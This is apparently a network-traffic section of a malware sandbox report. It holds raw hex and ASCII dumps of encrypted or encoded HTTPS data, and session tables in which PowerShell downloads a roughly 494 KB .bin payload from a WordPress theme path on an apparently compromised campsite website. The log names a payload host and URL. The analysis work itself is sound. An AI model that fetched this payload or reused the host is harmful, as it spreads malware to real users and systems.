                                                                          2024-11-30 19:15:03 UTC16384INData Raw: 71 5a 59 4a 45 6b 77 42 64 72 6c 72 53 73 68 48 50 63 46 31 37 7a 30 33 55 2b 41 38 77 58 58 67 50 4d 46 31 34 44 7a 42 64 65 41 38 77 58 58 67 50 4d 46 31 34 44 79 77 58 65 7a 79 57 39 2f 34 74 42 75 43 2f 62 70 2f 2f 39 4e 4e 44 65 4a 71 4c 62 37 6f 49 41 6e 4d 2f 47 56 45 77 33 58 67 61 33 34 52 54 77 6d 69 39 42 63 77 7a 47 43 2b 76 54 62 5a 64 4f 71 64 39 41 2f 34 39 49 4f 42 62 56 33 38 41 54 58 34 36 4e 6e 4f 73 6e 69 30 6e 65 73 76 39 2b 4f 4a 45 65 52 48 65 7a 6f 39 6a 41 74 35 4a 75 48 63 45 57 55 55 48 38 69 39 66 71 74 69 4b 37 32 38 41 52 49 51 77 58 58 76 73 5a 67 45 34 44 79 59 39 42 6b 45 77 61 53 4e 59 33 6b 39 36 4a 44 65 51 48 6f 47 52 68 50 76 50 42 2b 53 34 44 7a 42 64 65 41 38 77 58 58 67 50 4d 46 31 34 44 7a 42 64 65 41 38 77 58 58
                                                                          Data Ascii: qZYJEkwBdrlrSshHPcF17z03U+A8wXXgPMF14DzBdeA8wXXgPMF14DywXezyW9/4tBuC/bp//9NNDeJqLb7oIAnM/GVEw3Xga34RTwmi9BcwzGC+vTbZdOqd9A/49IOBbV38ATX46NnOsni0nesv9+OJEeRHezo9jAt5JuHcEWUUH8i9fqtiK728ARIQwXXvsZgE4DyY9BkEwaSNY3k96JDeQHoGRhPvPB+S4DzBdeA8wXXgPMF14DzBdeA8wXX
                                                                          2024-11-30 19:15:03 UTC16384INData Raw: 72 4c 59 56 49 72 6f 45 32 77 75 58 6b 6d 4b 47 56 56 57 78 7a 4a 34 53 6b 56 77 63 51 46 6e 45 57 46 36 6f 48 74 54 6d 53 4f 51 38 54 76 44 38 50 73 46 31 61 36 48 64 64 2b 41 38 53 6a 44 41 4f 65 65 39 6c 44 33 73 55 30 68 49 77 50 78 56 6c 63 42 31 34 4c 55 48 75 5a 51 4b 51 42 4e 6f 77 4d 55 56 52 61 47 44 43 43 74 41 5a 51 6e 62 44 47 2b 41 68 43 38 65 5a 4b 70 56 74 45 41 49 73 38 35 58 38 39 75 47 2b 6a 41 44 4d 4d 55 2f 62 5a 66 2b 56 5a 58 41 64 65 44 50 7a 72 4c 58 50 4d 46 31 34 44 7a 42 64 65 41 38 77 58 58 67 50 4d 46 31 34 44 7a 42 64 65 41 38 77 52 30 67 45 37 73 65 70 57 5a 43 63 56 4a 79 6a 4b 31 4f 70 37 4c 38 62 54 6a 44 64 65 43 31 47 43 54 76 2b 2f 70 32 34 44 7a 42 64 65 41 38 77 58 58 67 50 4d 46 31 34 44 7a 42 64 65 41 38 77 58 58
                                                                          Data Ascii: rLYVIroE2wuXkmKGVVWxzJ4SkVwcQFnEWF6oHtTmSOQ8TvD8PsF1a6Hdd+A8SjDAOee9lD3sU0hIwPxVlcB14LUHuZQKQBNowMUVRaGDCCtAZQnbDG+AhC8eZKpVtEAIs85X89uG+jADMMU/bZf+VZXAdeDPzrLXPMF14DzBdeA8wXXgPMF14DzBdeA8wR0gE7sepWZCcVJyjK1Op7L8bTjDdeC1GCTv+/p24DzBdeA8wXXgPMF14DzBdeA8wXX
                                                                          2024-11-30 19:15:03 UTC16384INData Raw: 32 6b 43 44 34 57 51 38 35 6d 48 53 62 66 53 66 53 55 68 6a 54 6e 45 57 44 7a 76 34 31 56 64 63 51 39 4b 77 43 4b 79 4d 52 58 67 53 4c 51 4f 62 71 51 6f 77 68 38 4f 2b 51 4a 6a 68 51 4e 6e 6a 53 72 63 72 48 34 6b 35 64 65 41 38 6b 38 2b 6f 64 63 65 31 59 66 36 72 33 57 33 61 51 49 66 44 70 31 6a 48 59 63 34 6a 34 42 79 72 51 4c 64 74 50 63 67 4a 74 36 42 49 6b 75 6b 72 58 42 4e 6c 79 72 56 6c 2b 74 73 73 65 49 77 37 58 5a 76 2b 4d 2b 51 7a 4f 48 43 34 5a 69 41 52 49 4a 32 4d 4b 52 73 78 6a 43 6c 4d 70 2b 4f 39 54 48 4a 46 6f 70 6e 54 2f 66 77 51 45 78 4a 32 6b 37 71 47 76 54 68 71 34 57 50 35 72 4c 72 44 64 4f 48 67 50 4d 47 64 57 73 72 43 64 62 43 45 6e 7a 35 49 35 4d 53 65 43 52 38 62 51 43 4e 73 30 43 33 6c 53 6c 70 58 39 57 35 64 2f 41 49 39 77 2b 6a
                                                                          Data Ascii: 2kCD4WQ85mHSbfSfSUhjTnEWDzv41VdcQ9KwCKyMRXgSLQObqQowh8O+QJjhQNnjSrcrH4k5deA8k8+odce1Yf6r3W3aQIfDp1jHYc4j4ByrQLdtPcgJt6BIkukrXBNlyrVl+tsseIw7XZv+M+QzOHC4ZiARIJ2MKRsxjClMp+O9THJFopnT/fwQExJ2k7qGvThq4WP5rLrDdOHgPMGdWsrCdbCEnz5I5MSeCR8bQCNs0C3lSlpX9W5d/AI9w+j
                                                                          2024-11-30 19:15:03 UTC16384INData Raw: 50 50 6d 43 59 55 47 4a 33 6c 59 38 77 58 70 6b 49 50 56 30 34 50 76 42 58 75 34 4e 6b 42 4e 68 77 6d 47 39 59 52 51 52 75 69 34 4b 51 45 55 4a 73 59 76 70 59 51 79 49 65 47 4d 42 52 4c 63 57 2f 69 72 38 56 52 72 44 64 65 43 43 46 4e 4a 30 6b 54 65 79 61 67 51 75 39 41 35 75 5a 75 6f 6a 76 51 65 2f 30 71 76 34 39 41 35 31 38 76 6e 44 42 41 74 30 45 4c 64 30 55 2b 49 38 77 52 4e 6c 39 51 5a 31 6b 33 6e 65 32 57 54 54 51 45 58 71 36 2b 6c 4f 32 4f 52 41 64 57 65 49 61 6a 78 68 44 44 33 4b 4e 76 54 45 55 43 42 55 79 46 6a 42 2f 4b 6c 38 59 4d 47 46 54 43 72 37 77 51 6d 52 35 73 4c 30 30 44 61 69 74 36 49 46 41 76 54 49 66 59 61 49 32 62 33 70 67 61 48 35 42 76 41 34 76 62 77 4a 48 54 37 42 64 65 2b 34 66 62 49 66 77 30 6a 67 30 6a 37 42 64 56 6f 6a 6f 30 39
                                                                          Data Ascii: PPmCYUGJ3lY8wXpkIPV04PvBXu4NkBNhwmG9YRQRui4KQEUJsYvpYQyIeGMBRLcW/ir8VRrDdeCCFNJ0kTeyagQu9A5uZuojvQe/0qv49A518vnDBAt0ELd0U+I8wRNl9QZ1k3ne2WTTQEXq6+lO2ORAdWeIajxhDD3KNvTEUCBUyFjB/Kl8YMGFTCr7wQmR5sL00Dait6IFAvTIfYaI2b3pgaH5BvA4vbwJHT7Bde+4fbIfw0jg0j7BdVojo09
                                                                          2024-11-30 19:15:03 UTC16384INData Raw: 6a 55 44 41 6e 7a 37 42 64 5a 64 59 77 31 6c 67 77 31 45 32 48 37 47 2b 64 2b 41 38 74 49 4b 6a 79 67 49 61 32 4e 49 47 64 72 39 42 55 6a 4f 47 75 52 50 30 79 79 79 67 2b 42 69 39 38 6a 49 30 65 63 68 4d 4f 4c 33 79 68 61 65 79 58 76 55 5a 63 67 62 77 4c 44 33 42 64 65 50 71 71 62 4a 68 75 51 31 30 34 44 78 55 4f 2f 30 48 52 62 78 68 69 51 31 30 34 44 79 38 59 45 5a 4c 52 5a 74 68 69 51 31 30 34 44 77 6e 52 4d 42 4a 52 4b 61 6a 77 30 79 35 34 54 7a 42 41 42 64 2f 42 6e 62 4e 74 46 41 73 5a 4e 42 41 52 6d 44 68 37 78 69 7a 68 77 58 79 77 33 64 41 6a 6c 55 38 77 58 58 76 75 49 47 76 34 7a 79 61 39 4e 4e 65 62 64 4f 41 76 65 71 57 75 46 36 41 38 43 47 34 41 66 51 6a 78 50 5a 6e 36 62 30 71 67 64 63 75 79 50 51 5a 77 72 2b 6e 32 66 76 43 4d 62 55 4a 6e 45 77
                                                                          Data Ascii: jUDAnz7BdZdYw1lgw1E2H7G+d+A8tIKjygIa2NIGdr9BUjOGuRP0yyyg+Bi98jI0echMOL3yhaeyXvUZcgbwLD3BdePqqbJhuQ104DxUO/0HRbxhiQ104Dy8YEZLRZthiQ104DwnRMBJRKajw0y54TzBABd/BnbNtFAsZNBARmDh7xizhwXyw3dAjlU8wXXvuIGv4zya9NNebdOAveqWuF6A8CG4AfQjxPZn6b0qgdcuyPQZwr+n2fvCMbUJnEw
                                                                          2024-11-30 19:15:03 UTC16384INData Raw: 76 79 66 51 59 63 36 76 6c 35 6b 33 51 49 64 66 49 31 51 78 74 71 42 49 6b 2b 45 71 58 45 30 35 54 64 44 4c 51 42 68 66 31 64 55 74 56 63 50 63 6b 78 66 2b 6c 6f 6e 58 77 37 34 55 36 6d 7a 72 34 6a 34 48 43 73 69 6a 79 2f 71 36 77 62 38 67 6f 59 6e 51 4f 51 2f 79 36 6e 74 4d 30 37 48 46 79 67 58 74 76 67 51 59 4c 78 2b 70 44 58 58 67 50 41 30 42 58 47 4c 5a 33 51 43 33 47 6e 46 73 66 58 55 64 42 44 4f 50 41 68 31 74 45 58 33 4c 5a 6a 44 79 68 64 69 62 6f 57 48 61 48 4b 7a 44 4d 65 71 45 4a 76 42 41 76 61 4d 74 54 5a 4d 48 79 67 52 66 54 79 64 33 75 32 37 62 6b 66 34 4f 2f 59 55 38 4e 2f 30 4e 46 72 70 68 43 6a 53 39 4f 4d 36 79 32 69 6e 42 64 65 41 38 77 58 58 67 50 4d 46 31 34 44 7a 42 64 65 41 38 77 58 58 67 50 4d 46 31 6a 64 6c 70 54 6f 57 70 5a 2b 6e
                                                                          Data Ascii: vyfQYc6vl5k3QIdfI1QxtqBIk+EqXE05TdDLQBhf1dUtVcPckxf+lonXw74U6mzr4j4HCsijy/q6wb8goYnQOQ/y6ntM07HFygXtvgQYLx+pDXXgPA0BXGLZ3QC3GnFsfXUdBDOPAh1tEX3LZjDyhdiboWHaHKzDMeqEJvBAvaMtTZMHygRfTyd3u27bkf4O/YU8N/0NFrphCjS9OM6y2inBdeA8wXXgPMF14DzBdeA8wXXgPMF1jdlpToWpZ+n
                                                                          2024-11-30 19:15:03 UTC16384INData Raw: 5a 38 4a 31 61 61 6d 53 64 2b 41 38 53 4c 65 79 74 31 51 6d 34 6a 7a 42 6e 58 70 6b 77 48 56 70 73 61 4e 33 34 44 78 34 65 59 33 57 33 30 77 78 76 54 42 34 59 49 32 62 39 42 46 54 75 55 47 65 76 54 41 61 64 56 50 37 4a 47 75 78 6f 33 66 67 50 4a 50 50 4a 55 54 78 59 32 48 47 61 33 58 67 50 4d 37 78 5a 6b 62 43 64 62 72 55 4d 6a 6e 6a 50 45 6a 34 64 7a 33 42 64 62 6b 45 45 50 77 6f 75 51 44 2b 62 61 76 41 64 65 41 46 45 76 41 37 74 37 78 56 61 62 6c 35 64 4f 41 38 65 66 62 6a 4e 54 38 54 32 66 33 30 7a 38 62 67 32 46 67 39 4e 68 4e 6f 7a 57 41 33 64 79 6f 39 42 76 35 6c 68 4d 42 31 34 4e 55 35 64 65 41 38 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                          Data Ascii: Z8J1aamSd+A8SLeyt1Qm4jzBnXpkwHVpsaN34Dx4eY3W30wxvTB4YI2b9BFTuUGevTAadVP7JGuxo3fgPJPPJUTxY2HGa3XgPM7xZkbCdbrUMjnjPEj4dz3BdbkEEPwouQD+bavAdeAFEvA7t7xVabl5dOA8efbjNT8T2f30z8bg2Fg9NhNozWA3dyo9Bv5lhMB14NU5deA8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                          2024-11-30 19:15:03 UTC16384INData Raw: 76 54 4a 57 62 45 32 30 39 41 74 37 59 31 45 4f 74 64 70 43 34 73 6f 30 66 54 79 45 4a 79 2f 77 4c 76 66 51 34 35 41 75 56 78 74 56 63 50 46 67 66 69 34 52 63 52 32 79 59 4b 50 36 61 4b 2b 69 56 41 63 75 68 4a 33 78 64 65 41 38 70 2f 35 34 6b 4d 46 31 34 47 74 2b 67 7a 53 66 64 2f 51 58 32 4f 36 49 30 37 30 32 45 68 4a 69 52 50 7a 33 78 36 72 2b 32 6e 48 6d 47 44 33 64 6b 57 37 6f 4b 64 53 2f 68 4e 6b 42 79 75 6b 54 30 74 73 66 54 6b 73 6f 38 6f 4f 48 6b 31 75 69 39 6b 2b 65 59 58 61 66 44 74 58 7a 54 33 5a 79 2f 79 70 72 4f 4f 57 79 5a 56 48 44 64 65 41 66 33 36 57 45 76 58 51 59 34 6a 7a 42 52 6c 42 6b 4a 50 52 56 55 63 4e 31 34 4d 49 4a 37 37 6b 7a 77 47 48 45 50 4d 46 31 34 44 7a 42 64 65 41 38 77 58 58 67 50 4d 46 31 34 44 7a 42 64 65 41 38 77 52 31
                                                                          Data Ascii: vTJWbE209At7Y1EOtdpC4so0fTyEJy/wLvfQ45AuVxtVcPFgfi4RcR2yYKP6aK+iVAcuhJ3xdeA8p/54kMF14Gt+gzSfd/QX2O6I0702EhJiRPz3x6r+2nHmGD3dkW7oKdS/hNkByukT0tsfTkso8oOHk1ui9k+eYXafDtXzT3Zy/yprOOWyZVHDdeAf36WEvXQY4jzBRlBkJPRVUcN14MIJ77kzwGHEPMF14DzBdeA8wXXgPMF14DzBdeA8wR1


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.44973792.205.55.1234432536C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-11-30 19:15:36 UTC244OUTGET /wp-content/themes/twentyseventeen/assets/images/UGrVRaObsgLG14.bin HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                          Host: www.campingplatz-goldbergersee.de
                                                                          Cache-Control: no-cache
                                                                          2024-11-30 19:15:37 UTC273INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Sat, 30 Nov 2024 19:15:36 GMT
                                                                          Content-Type: application/octet-stream
                                                                          Content-Length: 494656
                                                                          Connection: close
                                                                          Last-Modified: Wed, 13 Nov 2024 12:42:56 GMT
                                                                          ETag: "78c40-626caac4e615f"
                                                                          X-Cache-Status: MISS
                                                                          Accept-Ranges: bytes
                                                                          2024-11-30 19:15:37 UTC16111INData Raw: 01 ec d9 36 cc bb 68 ed 1e b5 75 5d 68 1e ad 58 14 e2 c6 d2 b8 16 c4 02 95 e1 0b 77 03 73 0e e1 44 52 a0 8c 7c ce f5 cf cf 00 78 2c fb de 57 fb 07 d7 b5 dc 19 57 af 36 e1 91 0a 20 c5 dc 90 b0 f7 8c d8 48 be 0a 00 02 8a 25 d3 6d 39 52 35 a0 6e 81 e5 e5 90 c8 9c 6a ae ee 8a 2d b1 b8 04 ae b8 85 85 ce 31 c7 e2 3c e8 29 75 16 8d b1 50 5c b4 e8 43 41 29 24 58 b8 99 c5 a1 c4 75 79 b5 c3 5f 55 ea d6 4d 29 d7 97 bd a0 d3 9d 33 d8 d7 90 4f 5d 6b da 99 54 72 fc db 3c ac 7f 91 53 e6 39 b9 39 c6 a2 dc 90 a1 8a 54 17 c9 e0 a7 7d b9 a8 5e eb 61 da 64 ec 20 69 b7 c9 10 71 cd dc 39 72 3e 62 7c fd ae 78 a4 0b a0 9f 95 bb 38 2e 9d 2f d2 73 d5 48 24 51 4d 88 b0 92 4b 10 07 a1 2f 8a 34 a4 c2 96 11 60 94 ad 4f 91 28 21 49 44 eb 59 11 79 10 13 9d b7 66 4c 76 4e 30 b3 42 45 cd
                                                                          Data Ascii: 6hu]hXwsDR|x,WW6 H%m9R5nj-1<)uP\CA)$Xuy_UM)3O]kTr<S99T}^ad iq9r>b|x8./sH$QMK/4`O(!IDYyfLvN0BE
                                                                          2024-11-30 19:15:37 UTC16384INData Raw: 25 0e 0a 92 21 1a 42 18 06 92 83 fe a6 77 d4 07 99 2b 6d 0c 2f fb af 03 f1 e6 32 a3 6f d8 29 7c dd c5 83 5b 46 75 62 db 6b 0a c0 e1 71 2d 61 c9 eb 37 0d 50 41 5a 2c 77 d0 b6 a3 8a 80 ac 95 01 dc 1c 1d 35 e8 1b 72 24 ca 79 60 e0 b1 04 aa b7 cf 1f 66 03 1b 89 0c 83 93 86 ec 07 a5 4c bc 9d b7 9d fd 67 3b 49 8f 99 00 e4 5c e1 a0 69 f1 2b 71 25 36 01 a8 05 47 91 d9 7b 5c 56 c5 13 13 23 ac a6 f9 90 2c b5 a4 c2 35 9c 62 c1 f0 af a0 2f 81 88 e8 d8 da 36 04 87 3b 28 b4 29 49 ed a1 3a 1c 1b 3e 21 4c 81 23 c6 7f 30 e9 2f 58 1e de 2b 0b ca a9 80 f1 97 c6 86 fc 75 7f ff ed 00 5a 8e 5c e0 33 49 fd fc e3 bd 45 b7 89 57 f6 d0 c3 48 39 69 0b fd 68 1e 85 a6 6b 66 ab b3 c6 07 57 a0 32 bb 7e 98 d0 fa 64 ed cc 33 a8 03 4f e2 48 2a 41 e8 97 0e 7a 78 76 dc 6d 7c 04 4c 44 20 96
                                                                          Data Ascii: %!Bw+m/2o)|[Fubkq-a7PAZ,w5r$y`fLg;I\i+q%6G{\V#,5b/6;()I:>!L#0/X+uZ\3IEWH9ihkfW2~d3OH*Azxvm|LD
                                                                          2024-11-30 19:15:37 UTC16384INData Raw: 6b 8c 05 04 f7 35 ca 64 f8 7e da a0 4a a0 54 06 f1 8c b2 7a f8 12 0a 21 da 35 9e cd 8b 42 23 d8 21 ef b9 f9 b3 5c ed 31 b3 f4 b7 46 82 33 df a5 b9 4d 8d 9a 25 06 a1 a8 22 a8 16 71 75 a7 b6 b8 78 14 03 6d 79 19 e3 90 ff ff c8 69 8a 04 d1 19 a4 ec 6a cc 12 47 b0 c7 67 2c 03 85 72 63 9c 57 4b 51 fd 58 c1 58 d9 69 5d e7 c8 20 6c 23 10 d8 69 3f cb 1f d7 ad f9 85 af 12 0d ed a4 69 43 af fe ae d8 00 63 44 65 37 7f a4 d8 0a c9 f3 2a 2b d6 5f 94 97 f7 35 58 f0 d4 05 93 26 3d 75 49 e2 e0 fd 41 12 72 8a cb 1a 45 36 87 b6 25 2e 36 1c 27 5e 58 33 45 d2 9d 50 af 13 28 30 03 c4 96 5f 81 cf 09 29 7e 78 5e 23 1c b9 52 d0 7b 74 cd 9f 5d 37 0b db eb 37 a0 8a fd 6e ac 82 09 c6 91 e9 c9 4b 1a c3 9d 76 65 e0 5a a4 87 ea c7 0e 90 79 9b 1c ad c1 51 fe 9d a5 f9 84 ea d1 e4 15 19
                                                                          Data Ascii: k5d~JTz!5B#!\1F3M%"quxmyijGg,rcWKQXXi] l#i?iCcDe7*+_5X&=uIArE6%.6'^X3EP(0_)~x^#R{t]77nKveZyQ
                                                                          2024-11-30 19:15:37 UTC16384INData Raw: 03 5a 2c 84 89 22 8d f0 23 90 18 6c 27 0e 61 ae ff 20 43 a4 3f 4b ef 98 36 f0 dd 1c 8a 44 c7 87 05 32 1f d9 7b 85 9e 60 70 c0 5a 0c 7c 8d 85 3f 3d 90 c2 13 0c a9 25 0f db db 0b 52 26 7f d8 76 42 73 dc c7 a4 26 a3 55 1a 09 e7 ae c8 3e 16 c9 81 23 fd a7 75 11 c4 c2 41 ee 3c 8e d9 06 f4 a8 6f cf 06 15 6d 25 b2 96 14 49 70 2d ec f6 cd f4 fb 78 21 b8 25 cc 57 7b c2 7d fb e7 58 a9 c0 e1 53 76 3b 2e 4d 21 a4 71 5b ca 01 96 5a 9b af 12 0e 06 7d 99 b8 9d d5 d8 dc 48 5e 6c 09 98 7a db c5 63 21 79 b5 be b3 e4 b6 3f 55 e8 0d 70 3e 72 87 9c 72 9d 59 cc f9 32 ae af 1c 41 59 29 60 05 ed 9e 66 4b 80 36 83 48 d1 9e 22 f6 bf e9 7d 14 21 86 43 b1 a4 c2 c6 88 97 9e 02 db c7 18 30 70 78 85 b4 ab 44 cf 72 0b 49 18 3a 52 37 96 f1 45 2f 20 40 d7 ee 82 3a d5 e0 a7 a9 ef 27 d2 22
                                                                          Data Ascii: Z,"#l'a C?K6D2{`pZ|?=%R&vBs&U>#uA<om%Ip-x!%W{}XSv;.M!q[Z}H^lzc!y?Up>rrY2AY)`fK6H"}!C0pxDrI:R7E/ @:'"
                                                                          2024-11-30 19:15:37 UTC16384INData Raw: 47 22 93 ea 1c 0f 3d 41 d8 6a 3a 7c af 02 f1 b3 a3 fd a5 6b 93 de 33 ac 2c 54 ac d4 a0 b7 c5 5a b9 22 a4 0e e0 03 a8 de ef 59 4e 32 75 92 33 58 ad 20 ec 92 25 87 bc b4 61 5e 38 04 e2 d6 97 ca de 92 e3 92 70 3c 58 c7 be 5a a8 1f 60 e1 3d c6 3b 4a f6 d2 79 47 5b fd 05 40 76 ce 21 46 02 52 24 75 85 51 9e ee 0c b8 87 8b 5f c6 a9 9d d6 d1 1d a9 4d e3 46 f4 68 de ba 25 04 2d 85 fc be 24 5c b7 1f a6 dc 73 e1 b5 be 6c 25 84 58 a9 ce 81 20 96 1f 52 a5 b5 59 da e9 cd ba a7 76 c7 4a 2b d8 14 18 5a 0e 27 17 52 00 b6 b7 42 81 c6 5c 4c 21 d3 38 4d 41 64 f1 80 0a 14 66 f5 34 9c 3b 11 9b 82 a6 b7 33 44 aa 7f 81 83 7e 44 81 e2 b7 ee a2 25 12 00 f3 a8 d5 f0 da bf ca 2f af 10 bc 9a 0b 49 b5 6f 78 b5 48 97 14 db 3d 10 5f d2 5a 17 59 f2 e2 2c c0 93 8c 23 a5 0a 9a 60 2b 9e 4c
                                                                          Data Ascii: G"=Aj:|k3,TZ"YN2u3X %a^8p<XZ`=;JyG[@v!FR$uQ_MFh%-$\sl%X RYvJ+Z'RB\L!8MAdf4;3D~D%/IoxH=_ZY,#`+L
                                                                          2024-11-30 19:15:37 UTC16384INData Raw: 39 01 52 ca de a0 a4 b9 06 1e b1 eb e1 43 ce a7 64 f1 dd 2d a8 f6 9b 2d cd 49 0e ce 95 ec 91 35 27 5f f0 d1 07 88 e7 f9 d0 12 83 d6 49 3b 32 37 8f f4 60 a6 91 fe d0 4d bc c5 12 e9 21 7a 72 57 51 83 30 66 93 2b 71 e4 ed 38 02 80 4a 8a f3 6b 88 38 c2 12 8b 2d fe 22 d6 03 3d 8d b7 29 a7 66 b9 a9 12 b9 68 a5 11 1c 2f f6 e3 c5 15 43 05 9b 32 83 3c 84 b6 97 8f cb 52 d2 0a e3 9a 1c b3 91 fa 75 d1 60 8e 5c 33 4a 43 98 0c 13 57 d7 c8 41 cf f9 a4 5b f9 ef 86 4b 39 1c 34 05 2b 46 eb ee 3e f5 ba 83 6a d6 3c 33 40 80 f3 f9 71 15 2d cc e7 c6 0d a0 9e 7e ba 52 ed 7d e9 90 f7 9d 08 e4 74 f6 15 a2 9b 06 77 86 d1 95 66 d7 24 e8 e4 f2 fd dd 1b 16 88 85 30 da ac 4b be a7 9a 18 e9 72 06 22 ca db 02 d6 4d 7a e4 3e 65 05 fd eb 31 6e 19 ca 72 a5 f4 5d 75 4d 7f 86 9a 03 2c 58 51
                                                                          Data Ascii: 9RCd--I5'_I;27`M!zrWQ0f+q8Jk8-"=)fh/C2<Ru`\3JCWA[K94+F>j<3@q-~R}twf$0Kr"Mz>e1nr]uM,XQ
                                                                          2024-11-30 19:15:37 UTC16384INData Raw: de 20 c2 fc 3d a8 27 6f 58 32 45 b7 c7 e6 46 05 3e 0a cc 16 85 3c aa f0 16 33 dc 37 c3 4b 62 aa 35 38 55 74 46 1b f4 e6 03 33 69 f7 0a 23 7f 95 8c e1 81 de 87 9f 00 22 32 7c 57 2c 72 93 9d d0 bb e1 c7 25 25 09 59 88 52 1a 5f 03 3f 54 41 7b 30 9c 62 5b 04 6c 99 59 e8 87 75 da 2c e0 92 89 65 19 8a 49 a3 e5 78 67 9b 6a ee dd 4a a0 cd 9c 30 ee 06 cd 4d 8b 31 4e a6 18 d8 8c d0 b3 28 82 a6 d5 f0 cc 07 17 a4 60 7c a0 5e 81 85 88 69 78 b5 c3 07 c3 14 fc 19 62 cb b6 d6 5f d2 5a 06 74 cf dc 06 a3 0f 8e db 6b 98 ca 9e 05 dc 4b 18 99 73 a9 32 92 ab 4a b8 c6 b4 8e 75 2e f0 3f b2 02 bc 77 47 a0 69 34 87 09 bc a5 6d 36 9b 76 c2 8b f9 24 64 7f cb c3 a2 46 52 8a 9c a1 67 3a 04 10 6f 06 d1 a5 e6 bd 48 c0 56 9c 4c eb 1a 4a 84 53 f1 60 36 dd b6 bf b8 2c 4e 58 0d a0 85 0f 08
                                                                          Data Ascii: ='oX2EF><37Kb58UtF3i#"2|W,r%%YR_?TA{0b[lYu,eIxgjJ0M1N(`|^ixb_ZtkKs2Ju.?wGi4m6v$dFRg:oHVLJS`6,NX
                                                                          2024-11-30 19:15:37 UTC16384INData Raw: 81 11 78 a2 6d 7c 12 d5 31 c7 b4 70 36 5a 5e 12 cb a1 7d c8 a3 44 05 86 05 21 b3 e1 1d 85 01 9d 9f c9 41 95 1a 06 c0 52 00 b9 e9 45 5f 39 d2 32 3f cc f4 9b 04 c9 f3 3d 94 d0 57 30 06 56 ab ca 4e 86 c0 9e f4 fc 1c d6 3a f8 7d 45 d2 b5 24 67 b4 10 33 13 1c b6 5e 89 0c 1e 01 8f ce b8 8c 9e cc 7e 7d 2d ae fa 9d f0 c5 25 f0 9e 58 9e 1d 02 4c fd ce 68 72 a9 df 51 46 c3 82 ce 71 7a 73 58 bb ba 61 1e 88 a6 4c bb e9 56 10 32 dd 37 b0 62 be 44 c1 43 ee 47 1b dd 3d 22 63 16 92 64 4d 3e c0 63 32 ed 89 ae ce 23 5a c6 7f d6 a3 0f f7 b3 9f 3c 96 31 7e 1b d4 2f f7 df 68 f8 69 c9 a5 ad 06 ad dc 18 36 54 8a 83 89 6a 34 a5 48 2f 73 ce 7b 03 36 44 60 71 ad d2 82 24 6d 84 1b f6 e4 61 d8 d5 1b 22 46 e9 8d f2 7f c3 ae f2 f8 84 fe d1 58 ff 72 19 02 68 62 bb 25 08 c7 de 06 7d 08
                                                                          Data Ascii: xm|1p6Z^}D!ARE_92?=W0VN:}E$g3^~}-%XLhrQFqzsXaLV27bDCG="cdM>c2#Z<1~/hi6Tj4H/s{6D`q$ma"FXrhb%}
                                                                          2024-11-30 19:15:37 UTC16384INData Raw: b7 c9 2e 28 53 05 2b 86 85 d9 da 35 a0 55 45 e9 60 50 bd f6 e1 82 ca 92 a8 4e cc 28 a1 0f c0 85 43 62 87 69 33 b8 c1 e3 79 8d b1 09 d9 74 9d 0d cc aa a4 58 b8 99 af ad 94 e0 fb 01 c3 51 4a 00 30 d1 c3 df 5a 1f dc de 54 08 8d 87 3e 60 27 4a 2f 14 4f 11 48 fd 58 8d 99 06 49 86 d5 6e d1 a4 c7 fc e2 57 47 b8 7e a7 c0 e3 b7 15 fc 3d 07 a6 7f 4a e1 2d 63 10 6a d4 71 cd dc 39 41 f2 46 9a 8d bd a1 23 26 bd d3 14 f6 8f b9 e2 65 2c f5 f2 bd a0 c8 71 f7 38 03 ed 84 e9 cf a9 77 22 23 92 ef ff 29 bd 2c f1 18 44 d2 99 e2 3d 27 c7 4e b8 dd d7 ad b0 3d 24 bb f5 cf 10 5f 90 66 08 87 1b 9f db ce cd d0 c2 18 1d 6b 05 53 4e 73 16 6a 2a 65 77 1a e1 7f a6 bb d0 6c 00 02 fc e8 5f 36 4a 03 a7 53 8f 69 25 b3 e4 5f 68 d4 b8 9a 11 8d cc aa 72 9d 1a a8 96 9d df aa eb 4a 39 33 78 9b
                                                                          Data Ascii: .(S+5UE`PN(Cbi3ytXQJ0ZT>`'J/OHXInWG~=J-cjq9AF#&e,q8w"#),D='N=$_fkSNsj*ewl_6JSi%_hrJ93x
                                                                          2024-11-30 19:15:37 UTC16384INData Raw: b4 57 e5 34 97 cd e7 4e 33 cb 58 66 b7 14 a7 e3 48 6c 13 85 b2 1b 75 5a ba fa e9 ad 0e c5 85 e7 43 f2 bb ce 9d e0 c6 da 6d ee 5b 12 ba ab e2 53 6b b6 58 d0 f7 40 bf 01 e5 b0 b9 2d 44 c1 99 d5 13 55 cc 35 19 2a cc d3 79 a0 97 52 62 32 7a fa a1 98 7c 8f d3 c1 65 bb d4 1c b3 99 18 77 c3 43 67 3c ce 1c df 82 6f a9 a8 b1 ab 32 fd 4e 1c 30 f6 0c 87 36 c3 9c d1 32 60 91 1d f5 b1 89 98 e7 fb 76 6a fa 51 2a 78 4a 2c 0d fd da d1 1b af 56 b9 6c 73 96 c1 ae 0d d6 ec 19 b9 d5 3d b3 e5 8d f4 d4 db 63 e3 6e 9a 5f 9e 5f 94 dd 6c ec f7 f3 d5 89 fc 30 d3 6a dc f7 aa c9 58 39 ec 94 63 5b 17 34 12 f1 09 ef 5a 6e df a6 1a 2f 5a 6e e5 4e 3b 03 5a d4 84 42 b4 1c e4 01 6a 76 9a 48 c0 64 20 a0 c4 68 21 86 18 8e 9d c4 50 16 76 66 8c dc 7f 49 6e b5 0a 87 8a 81 ed 56 41 fc a9 92 ca
                                                                          Data Ascii: W4N3XfHluZCm[SkX@-DU5*yRb2z|ewCg<o2N062`vjQ*xJ,Vls=cn__l0jX9c[4Zn/ZnN;ZBjvHd h!PvfInVA


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.44974281.169.145.1634436272C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          TimestampBytes transferredDirectionData
